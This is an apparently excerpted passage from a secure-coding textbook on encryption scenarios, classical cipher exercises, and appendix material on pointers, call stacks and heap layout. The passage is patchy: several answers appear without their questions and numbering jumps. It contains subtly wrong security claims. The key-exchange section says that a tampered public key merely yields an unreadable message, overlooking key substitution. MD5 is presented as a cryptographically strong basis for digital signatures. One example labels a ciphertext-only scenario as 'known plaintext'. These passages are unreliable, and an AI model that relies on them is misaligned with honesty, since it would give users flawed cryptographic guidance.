random bits. An example of such a key, written in hexadecimal, is the following:
0x5f2a2b23722f252d3f6a504640
The second requirement is to choose a strong symmetric algorithm. DES was once
a common choice, but its 56-bit key is too short and it can be broken easily.
Triple-DES is much stronger than DES but is slowly being phased out in favor of
stronger algorithms. AES is a viable solution with no known practical attacks, so
it should be a strong consideration. Even for relatively simple applications, it
would be unwise to choose a symmetric encryption algorithm other than Triple-DES
or AES.
Identification of Authorship
Another common encryption scenario does not involve privacy at all. Instead of
keeping the message hidden or secret, the goal is to prove that the author is
authentic. The goal is to provide assurance of the integrity of authorship.
To illustrate this scenario, imagine you (Bob) are working as an individual
contributor (IC) in a large organization. As you are working on a project one day,
you get an e-mail from the CEO (Alice). This message is surprising; apparently your
company is merging with your largest competitor and you are to begin sharing
intellectual property (trade secrets) immediately. After the initial shock wears off,
an important question comes to mind: can you trust this message? How do you
know that this message was not created from outside the company in hopes that
someone like you would give away valuable data? At this point in time, you would
like some assurance that the message actually came from your CEO.
Identification of authorship assurance can be achieved through the use of
asymmetric or public-key encryption. In this scenario, the CEO distributes a public
decryption key. Anyone can decrypt a given message with this key but it does not
provide any information as to how to encrypt a message. In fact, the CEO remains
the only person in the world who retains the private key, the key used to encrypt
a message. This means that any message that can be decrypted with the CEO’s
public key must originate from the CEO.
Key Exchange
Recall from our confidentiality scenario mentioned a few pages earlier that for
Alice and Bob to exchange a secret message, they first need to agree on a secret
key. If Eve is able to intercept this key, then all our confidentiality assurances are
lost. One easy way to get around this problem is for Alice and Bob to meet face-
to-face before any message passing takes place. This will certainly work in some
scenarios. However, most scenarios do not have this possibility. It is therefore
necessary to come up with a remote key exchange solution.
Figure 12.13: Secure key exchange by encrypting a symmetric key with a public key
1. In this scenario, Bob wishes to receive an encrypted message from Alice. Alice,
announcing to the world that she is willing to participate in a key exchange,
generates a private (K-) and a public key (K+) using an asymmetric algorithm such
as RSA. She keeps the private key to herself but shares her public key on her web
page. This sharing of the public key is represented with the top-most arrow in the
above figure.
2. Bob generates a cryptographically strong symmetric key (such as a 128-bit AES
key) and encrypts it using Alice’s public key using RSA. This means that only Alice
can decrypt the 128-bit AES key. Bob cannot even verify that the 128-bit AES
key was encrypted correctly! Bob sends this 128-bit AES key (encrypted using
Alice’s public RSA key) to Alice. Alice, receiving this message, decrypts it with
her private key. Now she can see the 128-bit AES key in plaintext. We can see this
exchange in the second arrow in the above figure. Notice how Bob encrypts the
key with Alice’s public key C+(KAES, K+) and Alice decrypts the message with her
private key C-(KC, K-).
3. Now that the AES key has been successfully exchanged, Alice and Bob can pass
messages back and forth without worrying about Eve intercepting or modifying
them. Here they use the AES key KAES for both encrypting and decrypting the
messages because AES keys are symmetric.
The question remains: is this key exchange secure? Is there any way that Eve can
intercept the key, alter a message, or read an encrypted message? Well, in the
first message, Eve can intercept and read the public key distributed to Bob. She
can even alter it before it reaches Bob. However, this key does not give Eve the
ability to read the Kc that Bob sends to Alice because a public key does not give
her the ability to decrypt the message. Furthermore, if Eve were to alter K+
before it reaches Bob, it would simply result in an unreadable message to Alice.
In other words, Bob would probably need to begin the key exchange process anew.
Certification
In our third scenario, we wish to have a secure communication with an online
merchant. In other words, Alice would like to purchase something from Bob’s
store. Eve will wish to get Alice’s credit card number or perhaps have her order
diverted. The big question is: how will Alice know that she is interacting with Bob’s
store and not a fake store set up by Eve? To accomplish this, Alice needs a
certification which verifies Bob’s store is what it claims to be.
Integrity
The final common application of encryption technology is to verify file or message
integrity. In other words, we would like some assurances that a message comes
from who we think it came from and has not been changed. Ideally, this is to be
accomplished without incurring the cost of encrypting the entire message. This
can be done with a digital signature.
A digital signature is a small appendix added to a message or file that verifies that
the message in its entirety has been created by a given author. This will be
explained in several steps, each of which adding a degree of integrity assurance
to Alice and Bob.
Step 1: Polarity Bit
Consider a message consisting of a collection of 1’s and 0’s. A polarity bit
(commonly called a parity bit) verifies the integrity of a message by counting the
number of 1’s in the message. If there are an odd number of 1’s, then a 1 is
appended onto the end of the message. If there are an even number of 1’s, then
a 0 is appended. This way, one can verify that the resulting block of data always
has an even number of 1’s (the message plus the polarity bit). In this case, there
are 4923 1’s so the polarity bit is 1:
polarityBit = 4923 % 2
            = 1
This is great for detecting whether a single bit has changed, but will not be able
to detect if 2 bits have been changed. In fact, all changes involving an even
number of bits will not be detected. The problem is even worse than this. If Eve
were to replace the file completely with a new counterfeit file, there is a 50%
chance that the polarity bit would validate the file. Clearly, this is an incomplete
solution.
Step 2: Checksum
We could add additional assurances by using a checksum. This is a number
representing the sum of the bits in a given file or message. For example, consider a
message that is 1024 bytes in length and a checksum that is 1 byte in length. We
count all the 1’s in the file and discover that there are 4923. The checksum is then
computed with:
checksum = 4923 % 256
= 59
Notice that we mod (modular division) the number of 1’s by the maximum size of
the checksum (1 byte is 8 bits so there are 2^8 or 256 possible values).
Since the checksum is 1 byte in size, there are 256 possible values. Thus the
chance of a random file matching the checksum is 1:256. If we increase the
checksum to 4 bytes, then the chance of a random file matching is 1:2^32. This may
seem like a great deal of security, but it is not. A checksum will detect whether a
bit was added or removed, but will not detect whether a bit was moved from one
position to another. In other words, 01100 has the same checksum as 00011.
Step 3: MD5
A hash function is a function that returns a given token called a hash value or
digest from a message. This is most useful when the message is much larger than
the digest. Thus the polarity bit and the checksum are examples of hash functions
and digests.
MD5 is the latest in a collection of message-digest algorithms (previous
incarnations were MD4 and MD2) designed to provide cryptographically
strong digests. Other cryptographic hash functions commonly used include SHA-1
and BLAKE2b. MD5 has a 128-bit digest, meaning the chance of a random
message matching a given digest is 1:2^128. Furthermore, cryptographic hash
functions are designed in such a way that transposing bits, changing
message length, or changing bits results in a completely different digest.
While an MD5 digest does add a large amount of confidence that a message was
not accidentally altered, it provides no assurance that Eve did not maliciously
alter the message. This is because MD5 is a known and published algorithm
requiring no password. Clearly we are not finished yet.
Step 4: Digital Signature
A digital signature is the combination of a cryptographically strong hash function
with asymmetric encryption. The idea is very straightforward:
1. Alice creates the message, in this case a PDF file Mpdf.
2. Alice computes a digest of the message with a cryptographic hash function
such as MD5: Dpdf = MD5(Mpdf).
3. Alice then encrypts the digest with her private key, generating an encrypted
digest. This digest is now Dc because it is ciphertext.
Dc = C+(Dpdf, K-)
4. Alice sends the message and the digest to Bob. At this point, it does not matter
whether Mpdf and Dc are in one file or two. Most modern file formats such as PDF
and DOCX allow the digest to be embedded in the file.
5. Bob receives the PDF and is unsure who authored the message (Alice or Eve) and
is unsure if Eve has altered the message while it was in transit. However, upon
opening the file, Bob notices the digital signature. He creates his own digest D on
the Mpdf and then verifies that against the digest he decrypted from Alice’s public
key C-(Dc, K+).
MD5(Mpdf) ↔ C-(Dc, K+)
There are a few things to notice about this scenario. The first is that the message
itself is not encrypted. Bob can choose to read the message without bothering to
verify that the message came from Alice or that the message was not changed by
Eve. This differs significantly from the Identification of Authorship scenario
presented earlier.
The second thing is that Bob can verify that the digest sent by Alice is authentic
and matches the message, but cannot generate his own digest. This is because
Alice used an asymmetric algorithm and did not share with Bob the private key.
The final thing to notice is that Alice’s public key could be intercepted and
changed by Eve. This means she might need to use a certification mechanism to
distribute her public key. In other words, the cryptographic scenarios are often
combined to meet the confidentiality and integrity needs of the client.
Examples
1. Q Classify the following scenario as steganography or cryptography: I authenticate
on my bank’s web site.
A If the user navigates to the login page, then all the world knows they are going
to be sending a password over the wire next. In other words, the existence of
the message is not hidden. Instead we wish to keep the password itself
confidential. This is cryptography.
A Many of the parables Jesus shared with the people were directed against the
religious and civil leaders of His day. One could argue that these leaders were
unaware a message was contained therein. If this is true, then the parables
would be steganography because the existence of the message was hidden.
A Asymmetric. If it were symmetric, then the same key could be used to decrypt
the message. Since the message cannot be decrypted, it is asymmetric.
A Symmetric. The message is read the same way it is written: by holding a mirror
up to it.
A Known plaintext. Though she did not know what the message said, she knew
the message was in English. Therefore she was able to recognize the plaintext
when it emerged.
6. Q Classify the following scenario as a chosen plaintext attack, a known plaintext
attack, or a ciphertext only attack: I encounter a stream of ciphertext being sent
over Wi-Fi from my neighbor’s house. Being nosey, I decide to crack it so I can
read his mail.
A Known plaintext. I do not have access to the key so I cannot generate more
messages at my leisure. However, I can tell when I guess the key because the
messages will suddenly be in English.
A Chosen plaintext. Because I am able to specify the plaintext and I can then look
through the ciphertext for the message; this is a chosen plaintext attack.
8. Q Encrypt the message “ATBASH” with the ATBASH cipher.
A Using an alphabet of only capital letters, the first row is the alphabet and the
second row is the alphabet reversed.
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Z Y X W V U T S R Q P O N M L K J I H G F E D C B A
Now we look up each character in the plain text message represented on the
first row with the corresponding ciphertext on the second row. The solution is:
“ZGYZHS”
9. Q Encrypt the message “CAESAR” with the Caesar Cipher using the password +3
A Using an alphabet of only capital letters, the first row is the alphabet and the
second row is the alphabet shifted by three.
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
D E F G H I J K L M N O P Q R S T U V W X Y Z A B C
Now we look up each character in the plain text message represented on the
first row with the corresponding ciphertext on the second row. The solution is:
“FDHVDU”.
10. Q Encrypt the message “ALBERTI” with the polyalphabetic algorithm using the
password +3 -1 +10 -5 +1
A Using an alphabet of only capital letters, the first row is the alphabet and the
second row is the alphabet shifted right by three, and the third row is left shifted
by one, and so on:
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
D E F G H I J K L M N O P Q R S T U V W X Y Z A B C
Z A B C D E F G H I J K L M N O P Q R S T U V W X Y
K L M N O P Q R S T U V W X Y Z A B C D E F G H I J
V W X Y Z A B C D E F G H I J K L M N O P Q R S T U
B C D E F G H I J K L M N O P Q R S T U V W X Y Z A
Now we look up each character in the plain text message represented on the
first row with the corresponding ciphertext on the second row, then third row,
then fourth row, and so on. The solution is: “DKLZSWH”
11. Q Encrypt the message “book” with the book cipher using the following run of text
as the key (where the first column and the first row are to serve as guides in
counting):
A 012345678901234567890123456789012345678901234567890123456789
000 A book cipher is a cipher where the plaintext message is con
060 verted to ciphertext through the user of a key and a large v
120 olume of text (Leighton & Matyas, 1984). The key serves as i
180 nstructions for picking the ciphertext from the volume. Ther
240 e have been a large number of book cipher algorithms used th
300 rough the years, each with varying degrees of practicality a
360 nd security. The first was proposed in 1586 by Blaise de Vig
420 enere where a transparent sheet of paper was placed over a v
480 olume of text. Alice would then circle the letters or words
540 of the plaintext on the transparent sheet. In this case, the
600 ciphertext is the transparent sheet and the key is the volu
660 me of text.
Note that there are many possible solutions. We need to first find some instance
of “b” in the text. Once this is found, we will write down the offset from the
beginning. There is a b at position 270 (5th row, in the word “book”). Once we
have done this, we will cross it out so we won't re-use that value. Now we will
find an instance of “o”. It is preferable that it is after the previous value we
looked up so we won't repeat codes. In this case, the value is in position 285 (5th
row in the word “algorithms”). Now we will look for another letter “o”. There is
one in position 480 (9th row, in the word “volume”). The final letter is “k”, to be
found in position 645 (11th row, in the word “key”). Thus a valid ciphertext is: “270 285 480 645”.
12. Q Write a function to implement the polyalphabetic encryption algorithm. The
input is plaintext, the output is ciphertext, and the password is a string.
string encryptMulti(const string & source, const string & password);
A Note that most people expect the output to consist of printable characters. It
would not do if the ciphertext for a given character was a NULL, resulting in the
premature termination of a string.
const char ALPHABET[] =
   "abcdefghijklmnopqrstuvwxyz"
   "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
   "1234567890"
   " ~!@#$%^&*(),./<>?;':\"[]{}\\|";
const int SIZE = sizeof(ALPHABET) - 1;
/*****************************************************
* INDEX FROM ALPHABET
* Find the offset of a character in the ALPHABET string
*******************************************************/
int indexFromAlphabet(char letter)
{
   for (const char *p = ALPHABET; *p; p++)
      if (*p == letter)
         return (int)(p - ALPHABET);
   return 0;   // not found; fold unknown characters onto the first letter
}
13. Q If I have a key size of 8 bits, how many possible passwords are there?
A With 8 bits, there are 2^8 or 256 possible keys.
14. Q Which has a larger key size: DES or AES?
A DES has a fixed key size of 56 bits. AES has a variable key size of 128, 192, or 256
bits. Thus even the weakest AES key is stronger than DES.
15. Q How many possible keys must be tried using the brute-force method to crack a
128-bit AES message?
A Using a standard brute-force attack, all 2^128 keys will need to be tried. This is
340,282,366,920,938,463,463,374,607,431,768,211,456 or 3.4 x 10^38.
If we take advantage of a theoretical weakness, the key strength is reduced to
2^110.5 which is roughly 1.8 x 10^33. This is about 200,000 times easier to crack.
16. Q What would be a 1-bit, 2-bit, and 3-bit check-sum for the following ASCII
message: “Signature”?
A Note that 83 for the capital ‘S’ in binary is “01010011” which has four 1’s. When
we look at the complete bit-stream for “Signature”, we get:
01010011 01101001 01100111 01101110 01100001 01110100 01110101 01110010
01100101
There are 38 1’s in total. Thus the 1-bit checksum is 38 % 2 = 0, the 2-bit
checksum is 38 % 4 = 2, and the 3-bit checksum is 38 % 8 = 6.
Exercises
1 I keep my grades in an encrypted Excel spreadsheet on a USB thumb drive.
Describe Alice, Bob, and Eve in this scenario.
5 From memory, list all you know about the following encryption algorithms:
• ATBASH
• Caesar Cipher
• Polyalphabetic
• XOR
• Enigma
6 Decrypt the following message that was encrypted with +3 using the Caesar
Cipher
VHFXULWB
7 Decrypt the following message that was encrypted with a book cipher where
the key is “Proverbs 3” from the King James version of the Old Testament:
50 216 55 23 9 27 10 96 72 59 216 101
9 How many guesses will it take to crack a message of Russian Cyrillic text? (Hint:
how many characters are there in the Cyrillic alphabet?)
11 From memory, list and define the major encryption algorithms. What are their
defining characteristics?
12 Which encryption algorithm would be useful for a Digital Signature?
• DES
• Vigenere
• Book
• Blowfish
• RSA
• Multi-Alphabet
• AES
13 If I use a 1-bit hash, how much change in the message can be detected? In other
words, how close can two different messages be and still have the same hash?
Problems
1 List and describe five ways to hide a message using steganography.
3 Is the Gold Bug ratio the same for all languages? Explain your rationale.
8 Research another encryption algorithm that is used today. Provide at least one
good reference describing this algorithm.
• What are its properties?
• For what types of applications might one use this algorithm?
• Which of the algorithms mentioned in this chapter are most similar to the
one you found?
9 If the message is a 32-bit number, how large must the hash be to be “absolutely
secure?” In other words, what size must the hash be so that any change to the
message can be detected?
10 If the message is an 8 letter ASCII password, how large must the hash be to be
“absolutely secure?” In other words, how large must the hash be so that any
change in the message can be detected by the recipient?
11 If the message is a 1k paragraph, how large must the hash be so the attacker
has a “one in a million” chance of changing the message without being
detected?
12 Research Bitcoin. It uses public-key cryptography and cryptographically strong
hash algorithms in an interesting and unique way. Draw a figure describing how
data is transferred and what processes are used. Also, describe the main
concepts such as the ledger, a blockchain, and a transaction in terms of the
concepts presented in this chapter.
Appendix
7 4 2 9 3 1 8 2 9 1 2
Figure A.1: How an array is stored in memory with most programming languages
Consider the first element in an array. We can access this item two ways:
cout << "array[0] == " << array[0] << endl;
cout << "*array == " << *array << endl;
assert(array[0] == *array);
The first output line will of course display the value 7. The second will dereference
the array pointer, yielding the value it points to. Since pointers to arrays always
point to the first item, this too will give us the value 7. In other words, there is no
difference between *array and array[0]; they are the same thing!
Similarly, consider the 6th item in the list. We can access it with:
cout << "array[5] == " << array[5] << endl;
cout << "*(array + 5) == " << *(array + 5) << endl;
assert(array[5] == *(array + 5));
This is somewhat more complicated. We know the 6th item in the list can be
accessed with array[5] (remembering that we start counting with zero instead
of one). The next statement (with *(array + 5) instead of array[5]) may be
counterintuitive. Since we can point to the 6th item on the list by adding five to
the base pointer (array + 5), then by dereferencing the resulting pointer we get
the data:
array array + 5
7 4 2 9 3 1 8 2 9 1 2
array[5]
Figure A.2: How array indexing is implemented with most programming languages
Therefore we can access any member of an array using either the square bracket
notation or the star-parentheses notation.
All variables reside in memory. We can retrieve the address of a variable with the
address-of operator:
{
int data; // “data” resides in memory
cout << &data << endl; // “&data” will return the address of “data”
}
It turns out that functions also reside in memory. We can retrieve the address of
a function, store the address of a function, and de-reference the address of a
function in much the same way we do other pointers.
Note how we do not include the ()s here. When we put the parentheses after a
function, we are indicating we want to call the function.
int main()
{
   void (*p)(double);   // pointer to a function. Variable 'p'
   *p(value);           // ERROR!

This is an error. The call parentheses () bind more tightly than the dereference
operator *, so the compiler thinks you are calling a function named p() returning
a pointer which is then to be dereferenced. To make your intentions clear, a
slightly heavier syntax is required:
(*p)(value); // CORRECT, though the p(value) convention is more convenient
In this case, we are first dereferencing the pointer variable p before attempting
to call the function, exactly what is needed. It turns out that the dereference
operator (*) is optional here. As long as there is not another function named p,
we can simply say:
p(value); // CORRECT, though one might expect to need the * to dereference ‘p’
Observe how the first parameter p is a function pointer. The easiest way to call
this function is by specifying the address of the target function directly:
{
function(display, 3.14159); // we could also say function(&display, 3.14159);
}
Now, to add these three member functions to Card, we need to add three
function pointers:
struct Card
{
   int card;
   void (*set    )(      Card *pThis, int iSuit, int iRank);
   int  (*getRank)(const Card *pThis);
   int  (*getSuit)(const Card *pThis);
};
The final step is to instantiate a card object. This means it will be necessary to
initialize all the member variables. Unfortunately, this is a bit tedious:
{
   Card cardAce;
   cardAce.set     = &set;     // this is tedious. Every time we want to
   cardAce.getRank = &getRank; // instantiate a card object, we need to
   cardAce.getSuit = &getSuit; // hook up all these function pointers!
}
From here, we can create a single global instance of VTableCard to which all Card
objects will point:
const VTableCard V_TABLE_CARD = // global const for all Card objects
{
&set, &getRank, &getSuit // here we hook up all the function pointers
}; // once, when we instantiate V_TABLE_CARD
So how does this change the use of the Card class? Well, instantiating a Card
object becomes much easier but the syntax for accessing the member functions
is much more complex:
{
Card cardAce;
cardAce.__vtptr = &V_TABLE_CARD; // with one line, all the function pointers
// are connected in a single command
cardAce.__vtptr->set(&cardAce, 3, 0);
}
Note that while __vtptr is a member variable of Card and, as such, requires the
dot operator, __vtptr itself is a pointer. It is necessary to either
dereference it with the dereference operator * or use the arrow operator ->
when accessing the members it points to.
1 8 9 0
1000 + 800 + 90 + 0 = 1890
Figure D.1: How to convert an array of digits into an integer
Thus we can store the number 1890 as:
int num[] = { 1, 8, 9, 0 };
Since computers are fundamentally binary, we don’t use an array of digits but
rather an array of bits. This means that each place in the array does not
correspond to a power of 10 (for digits) but rather a power of 2 (for binary). The
same number would be:
1890 = 2^10 + 2^9 + 2^8 + 2^6 + 2^5 + 2^1
If we were to write this out as an array of bits, it would be:
2^10 2^9 2^8 2^7 2^6 2^5 2^4 2^3 2^2 2^1 2^0
  1   1   1   0   1   1   0   0   0   1   0
1024 + 512 + 256 + 0 + 64 + 32 + 0 + 0 + 0 + 2 + 0 = 1890
Figure D.2: How to convert an array of bits into an integer
Thus we can store the number 1890 as:
bool num[] =
{
true, true, true, false, true, true, false, false, false, true, false
};
The next problem we need to address is how to handle negative numbers. On the
surface, this seems rather trivial. We will define a structure which consists of an
array of Boolean values plus a Boolean sign variable.
struct Integer
{
   bool array[31];    // for the array of bits
   bool isNegative;   // for negative numbers
};
There is a problem with this approach: there are two different representations
for zero. The first would be an array of all zeros and isNegative == false. The
second would be an array of all zeros with isNegative == true. Since -0 == 0,
these two different integer representations would represent the same thing. In
other words, I would have to do more than just compare the member variables
to determine whether two numbers are equal. The common solution to this
problem is 2’s complement. Consider how -37 would be represented:
1. Start with the binary representation of the positive number:
0 0 1 0 0 1 0 1
0 + 0 + 32 + 0 + 0 + 4 + 0 + 1 = 37
Figure D.3: Convert an array of bits into an integer
2. Find the complement of all the bits:
1 1 0 1 1 0 1 0
Figure D.4: Invert (find the complement of) the bits
3. Add 1.
1 1 0 1 1 0 1 1
Figure D.5: Adding one completes the 2’s complement where the first bit is the sign (+/-)
Notice how the left-most bit is 1, indicating the number is negative. We mark this
bit as shaded to emphasize that it is special: it indicates the number is negative.
This binary representation of signed (positive or negative) numbers has several
desirable properties:
Unique Zero First, there is only one 0 value. In other words, we don’t run into the strange -0
!= 0 problem which was discussed previously.
Negative Bit Second, it is easy to tell whether a number is negative: just check the left-most
bit.
Zero is 0x00 Third, zero is represented as all 0’s, which is the same test used for Boolean
values.
Increment & Decrement Finally, the increment and decrement operations work exactly the same for
signed numbers as they do for unsigned numbers.
-3 1 1 1 1 1 1 0 1
-2 1 1 1 1 1 1 1 0
-1 1 1 1 1 1 1 1 1
0 0 0 0 0 0 0 0 0
1 0 0 0 0 0 0 0 1
2 0 0 0 0 0 0 1 0
3 0 0 0 0 0 0 1 1
4 0 0 0 0 0 1 0 0
An interesting thing happens when we get to the end of a number. Here, with our
8-bit signed integer, we represent the value 127 as:
Decimal Binary
127 0 1 1 1 1 1 1 1
[Figure: structure chart of the Tic-Tac-Toe program. main() calls interact(),
clearBoard(), readBoard(), and writeBoard(); interact() calls displayOptions(),
displayBoard(), editSquare(), and getText(); editSquare() calls convertSymbol()
and getCoordinates(). Data such as board, xTurn, fileName, row, col, and
symbol is passed between them.]

Stack
Stack
In our Tic-Tac-Toe program, consider the moment in time when program
execution is in getCoordinates(). After this function is finished executing, which
function will take control? The answer is editSquare() because editSquare()
is the function that called getCoordinates(). How would one store this
execution order so, whenever a function returns, we know which function to give
control to? Through inspection of this problem, it should be clear that we are
following a last-in, first-out execution sequence. The last function that is executed
is the first function to be removed from our collection of function names.
Similarly, the first function executed (main() for C or C++ programs) is the first
function added to our collection and is the last to be removed. What data
structure maintains first-in-last-out (or alternatively last-in-first-out)? The answer
is a stack.

We call the collection of functions that are called at a given moment in time the
“call stack.” From our previous example, when getCoordinates() is being
executed, we can see that it was called from editSquare() which was called by
interact() which was called from main(). Note that main() was called from
the operating system (OS).
When we call a function, we simply push the name of the function onto the stack
and when we return out of a function, we pop the function off the stack:
class CallStack
{
private:
   stack <string> callStack;
public:
   // start by pushing "main" for C and C++ programs
   CallStack() { callStack.push("main"); }

   // calling a function pushes the name onto the call stack
   void callFunction(const string & name) { callStack.push(name); }

   // returning from a function pops the name off the call stack
   void returnFromFunction() { callStack.pop(); }

   // the function currently executing is on top of the stack
   string getCurrentFunctionName() const { return callStack.top(); }
};
Finally, we can see what function will be executed when we return out of
getCoordinates():
{
   callStack.returnFromFunction();
   cout << callStack.getCurrentFunctionName();   // editSquare
}
Here we can see that, after getCoordinates() finishes, we return execution
to editSquare(). After editSquare() returns, we go to a location in
interact(). This continues until main() returns. When that happens, control
returns to the operating system.
0x92015731 points to somewhere in the OS
0x04019732 points to main()
0x04015314 points to interact()
0x04017432 points to editSquare()
Figure E.3: The call stack where each element is a return pointer
class CallStack
{
private:
stack <void *> callStack;
public:
// start by pushing the ip of the operating system onto the call stack
CallStack(void * ip) { callStack.push(ip); }
// calling a function pushes the instruction pointer onto the call stack
void callFunction(void * ip)
{
callStack.push(ip);
}
// returning from a function pops the ip off the call stack and returns it
void * returnFromFunction()
{
void * ip = callStack.top();
callStack.pop();
return ip;
}
};
Notice how we save our current IP on the stack and set the next instruction to the
address of the called function. Returning from a function is much easier:
ip = callStack.returnFromFunction();
There is one huge complication to this local variable problem: we cannot depend
on the space requirements for all the functions in a program to be the same. For
example, in our Tic-Tac-Toe program, main() requires nine bytes of memory for
the board local variable and an additional one byte for the xTurn local variable.
However, interact() has only a single integer requiring four bytes. This means
that if we attempt to push the local variables onto our call stack, the elements in
the call stack will be of a different size. How can we accomplish this?
There are three main solutions to representing a stack with variable size
elements. The first is to have each element be the same size but it refers to
memory allocated elsewhere that contains the variable amount of space. The
second is to remember the size of each element and push that value onto the
stack. Most stack implementations do neither of these and follow a third
implementation. They push on a value called a frame pointer. This pointer
functions like a linked-list and points to the next “frame” or element in the stack.
[Diagram: each frame on the call stack holds a frame pointer, a return address (pointing to main, to interact, and so on), and the local variables for its function.]
Figure E.5: Call stack with local variables, frame pointers, and return addresses
This frame pointer makes the stack operate like a linked list. When a new function
is pushed onto the call stack, three things are added: the return address, the local
variables, and the frame pointer. As mentioned earlier, the return address refers
to the next instruction to be executed after the function is finished. The local
variables include all the variables necessary for the function to execute as well as
all the parameters in the function. This local variable area can be just about any
size. Finally, the frame pointer points to the frame pointer of the previous
function in the call stack. This enables the program to remove a given function
from the call stack when it is complete.
[A sequence of figures shows the call stack growing as main() calls interact() and interact() calls editSquare(), then shrinking when editSquare() returns. Each call pushes a frame pointer, a return address, and the callee's local variables: board plus padding for main(); a board pointer plus padding for interact(); and a board pointer, xValue, yValue, and counter for editSquare().]
Figure E.9: Call stack after editSquare() returns control back to interact()
We will write a simple program to display the contents of the call stack:
Array-Based Heap
Consider a program where all heap allocations are exactly the same size. If the
heap request resulted in a chunk of size 1024 bytes and each heap allocation
block was exactly 64 bytes, then eight allocations would be possible. This could
be managed with a simple Boolean array where each Boolean refers to whether
a given block of memory is utilized.
bool blocks[NUM_BLOCKS];
To allocate memory, it is necessary to traverse the blocks array and look for a
false slot. When one is found, mark it as busy by setting the slot to true and return
the corresponding block of memory.
void * alloc()
{
   for (int i = 0; i < NUM_BLOCKS; i++)
      if (blocks[i] == false)
      {
         blocks[i] = true;
         return heap + (i * SIZE_BLOCK);
      }
   return NULL;
}
Because all blocks are the same size, we can simply sub-divide the heap into
blocks and index into them using an array of Booleans. This is very fast and
efficient, but only works when the blocks are the same size. When they are not,
a linked list implementation is required.
Doug Lea
Doug Lea implemented a widely used heap management system that can be
considered the ancestor of most modern systems. Doug used a doubly-linked list
to connect blocks of memory in the heap. The UML class diagram is:
MCB
- size
- sizePrev
- isFree
Note that a size is used rather than a pointer. This is because all the nodes in
this linked list live in the same contiguous heap and they are in order. Thus the
size variable can be much smaller than a pointer; it only needs to be able to
represent the maximum size of a chunk of memory. This, combined with the fact
that the minimal size of a chunk is typically 8 bytes (taking 3 bits to represent),
means that the low three bits of the size field are always zero and are available
to store flags such as isFree.
Example
To illustrate how the Doug Lea heap model works, we will walk through a scenario
where we have a 1024-byte heap and an 8-byte MCB. The heap starts empty.
[Diagram: the 1024-byte heap holds a single MCB followed by 1016 free bytes.]
The FLINK and BLINK (Forward LINK and Backward LINK, a doubly linked list
connecting all the free blocks) are both set to NULL because this lone free block
is the only node in the list.
Next we allocate a 32-byte block of memory:
char * data1 = new char[32]; // allocate 32 bytes
[Diagram: the heap now contains an MCB, the 32 allocated bytes, a second MCB, and 976 free bytes.]
The first MCB refers to the allocated block of 32 bytes. The second refers to the free block of 976 bytes (1024 – 2×8 – 32):
mcbF.size = 976   mcbF.sizePrev = 32   mcbF.isFree = true
Since we only have one free block, the FLINK and BLINK are still NULL pointers so
the doubly linked list still has only one node in it.
Next we will allocate two more blocks of memory, 256 bytes and 8 bytes:
char * data2 = new char[256]; // allocate 256 bytes
int * data3 = new int; // allocate 8 bytes
[Diagram: the heap now contains four MCBs and their blocks: the 32-byte block, the 256-byte block, the 8-byte block, and 696 free bytes.]
Notice that we have consumed 296 bytes of memory for program usage (32 + 256
+ 8 = 296) and 32 bytes for MCBs (4 x 8 = 32). This means we have 696 bytes
remaining (1024 – 296 – 32 = 696). Also notice that we still only have one block
of free memory. Therefore our FLINK and BLINK pointers are still NULL.
Next we free the 256-byte block:
delete [] data2; // free the 256-byte block
[Diagram: the heap now contains the 32-byte allocated block, a 256-byte free block, the 8-byte allocated block, and a 696-byte free block, each preceded by its MCB.]
However, our doubly linked-list of free blocks has gotten more complex. The
FLINK pointer (forward link) of the first free block now points to the second block
and the BLINK pointer (backward link) of the second free block now points to the
first block.
We will make one final modification to our heap. We will make another allocation.
To do this, we will go through our linked-list of free blocks and find the first one
that has enough space. We will then take just what we need and mark the rest
as free. Since we are only allocating 64 bytes, this will leave most of the 256-byte free block unused.
double * data4 = new double[4]; // doubles are 16 bytes on this computer
[Diagram: the heap now contains five MCBs and their blocks: the 32-byte block, the new 64-byte block, a 184-byte free block, the 8-byte block, and the 696-byte free block.]
We still only have two blocks in our free linked-list: one of 184 bytes and another
of 696 bytes.
Code of Ethics
Because ethics and morality are the fundamental distinction between white hats
and black hats, each of us should read these two documents so we can get a
clearer picture of which types of behavior are acceptable and which are not.
(ISC)². (2017). (ISC)² Code Of Ethics. Retrieved from International Info System Security Certification
Consortium: https://www.isc2.org/Ethics
ACM. (1992, October 16). ACM Code of Ethics and Professional Conduct. Retrieved from Association for
Computing Machinery: http://www.acm.org/about-acm/acm-code-of-ethics-and-professional-conduct
(ISC)². (2017). (ISC)² Code Of Ethics. Retrieved from International Info System Security Certification
Consortium: https://www.isc2.org/Ethics
ACM. (1992, October 16). ACM Code of Ethics and Professional Conduct. Retrieved from Association for
Computing Machinery: http://www.acm.org/about-acm/acm-code-of-ethics-and-professional-conduct
Ahmad, D. (2003). The Rising Threat of Vulnerabilities Due To Integer Errors. IEEE Security & Privacy, 77-
82.
Anderson, R., & Petitcolas, F. (1998). On the Limits of Steganography. IEEE Journal of Selected Areas in
Communications, 16(4), 474-481.
Bartik, M., Bassiri, B., & Lindiakos, F. (n.d.). Exploiting Format String Vulnerabilities for Fun and Profit.
Bell, D., & LaPadula, L. (1973). Secure Computer Systems: A Mathematical Model. MITRE Technical
Report 2547.
Ben-Itzhak, Y. (2009). Organized Cybercrime and Payment Cards. Card Technology Today, 10-11.
Bezroukov, N. (1999, February 11). CONCEPT virus. Retrieved from Soft Panorama:
http://www.softpanorama.org/Malware/Malware_defense_history/Ch05_macro_viruses/Zoo/concept.shtml
Biba, K. (1975). Integrity Considerations for Secure Computer Systems. MITRE Technical Report 3153.
Brin, S., & Page, L. (1998, April 1). The Anatomy of a Large-Scale Hypertextual Web Search Engine.
Proceedings of the Seventh International Conference on World Wide Web 7, 30, 107-117.
Caloyannides, M. (2003, May). Society Cannot Function Without Privacy. IEEE Security and Privacy, 1(3),
84-86.
Champeon, S. (2000, May 1). XSS, Trust, and Barney. Retrieved from Hesketh:
http://www.hesketh.com/publications/xss_trust_and_barney.html
Cialdini, R. (2006). Influence: The Psychology of Persuasion. New York: Harper Business.
Clark, D., & Wilson, D. (1987). A Comparison of Commercial and Military Computer Security Policies.
Security and Privacy, 1987 IEEE Symposium (pp. 184-194). IEEE.
Donnelly, M. (2000). An Introduction to LDAP. Retrieved from LDAP Man.org:
http://www.ldapman.org/articles/intro_to_ldap.html
